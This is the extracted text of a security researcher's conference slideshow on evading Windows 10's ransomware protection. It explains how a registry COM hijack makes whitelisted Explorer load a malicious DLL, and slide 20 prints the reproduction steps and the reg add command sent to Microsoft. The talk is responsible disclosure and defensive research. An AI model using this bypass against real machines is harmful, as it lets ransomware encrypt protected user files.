Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

An Inconvenient Truth: Evading the Ransomware Protection in Windows 10


Published on

The WannaCry cyber-attack all over the world in May, 2017 is still fresh in our minds. The malware encrypted and rendered useless hundreds of thousands of computers in over 150 countries. As a measure against ransomware, Microsoft introduced the function "Ransomware protection" in "Windows 10 Fall Creators Update". How does this function work? Is it really effective? In this talk, I will explain the operation principles of "Controlled folder access" of "Ransomware protection" through demonstration video. Then I show the requirements to avoid this function, and describe that this function can be avoided very easily. And I will ask you that we may have to reconsider the definition of vulnerability.

Published in: Software
  • Be the first to comment

  • Be the first to like this

An Inconvenient Truth: Evading the Ransomware Protection in Windows 10

  1. 1. An Inconvenient Truth: Evading the Ransomware Protection in Windows 10
  2. 2. My Profile 1992 ~ 2014 software developer of Windows. 2015 ~ security researcher - 2016 AVTOKYO - 2017 BSides Las Vegas - 2018 GrrCON - 2018 ToorCon - 2018 DerbyCon 2018 ~ BSides Tokyo Organizer - 2018 first BSides in East Asia SOYA AOYAMA Researcher @ Fujitsu System Integration Laboratories Ltd Fujitsu Security Meister, High Master, Global White hacker Organizer @ BSides Tokyo
  3. 3. May 12, 2017
  4. 4. May 12, 2017
  5. 5. Microsoft's answer to Ransomware
  6. 6. TANMAY GANACHARYA Principal Group Manager, Windows Defender Research Ransomware protection on Windows 10 For end users, the dreaded ransom note announces that ransomware has already taken their files hostage: documents, precious photos and videos, and other important files encrypted. On Windows 10 Fall Creators Update, a new feature helps stop ransomware from accessing important files in real-time, even if it manages to infect the computer. When enabled, Controlled folder access locks down folders, allowing only authorized apps to access files.
  7. 7. The truth is …
  8. 8. Windows system folders are NOT protected by default.
  9. 9. The truth is …
  10. 10. Microsoft ONLY knows.
  11. 11. app folders Ransomware protection Mechanism allowed apps Explorer Protected folders Documents Pictures PowerShell System32cmd Word
  12. 12. You ain't heard nothin' yet!
  13. 13. app folders Simple Idea allowed apps cmd Explorer Protected folders Documents Pictures PowerShell System32 Word
  14. 14. YAGO JESUS MICROSOFT ANTI RANSOMWARE BYPASS By default, Office executables are included in the whitelist so these programs could make changes in protected folders without restrictions. This access level is granted even if a malicious user uses OLE/COM objects to drive Office executables programmatically. So a Ransomware developer could adapt their software to use OLE objects to change / delete / encrypt files invisibly for the files owner
  15. 15. My method is …
  16. 16. Only using a bat file
  17. 17. • HKCR = HKLM Software Classes + HKCU Software Classes • HKLM Software Classes < HKCU Software Classes (In case of duplication)
  18. 18. {90AA3A4E-1CBA-4233-B8BB-535773D48449} • HKLMSOFTWARE Classes CLSID • HKCU Software Classes CLSID
  19. 19. HKCR %SysteRoot%system32shell32.dll Explorer.exe Shell32.dll HKCU HKLM %SysteRoot%system32shell32.dll Malicious.dll User’s Files ServerShareMalicious.dll ServerShareMalicious.dll File encryption process Sharing File
  20. 20. I submitted the vulnerability report to MSRC • Step-by-step instructions to reproduce the issue on a fresh install 1. Put the malicious dll on shared file server. ( 2. Start the cmd.exe on target PC. (An administrator privilege is NOT required) 3. Execute the following command. 4. Start the procexp.exe on target PC. reg add HKCUSoftwareClassesCLSID{90AA3A4E-1CBA-4233-B8BB-535773D48449} InprocServer32 /f /ve /t REG_SZ /d taskkill /IM explorer.exe /F start explorer.exe
  21. 21. MSRC's answer was…
  22. 22. How about other antimalware application?
  23. 23. No antimalware application can block my malware
  24. 24. How to avoid it? always check if malicious values are written in the registry.
  25. 25. Ransomware protection PC BPC A security boundary Ransomware protection MS17-010 Documents Pictures Videos Music Desktop Favorites security vulnerability new boundary
  26. 26. We should reconsider the definition PC BPC A security boundary Ransomware protection security vulnerability security sub boundary security sub vulnerability Documents Pictures Videos Music Desktop Favorites
  27. 27. @SoyaAoyama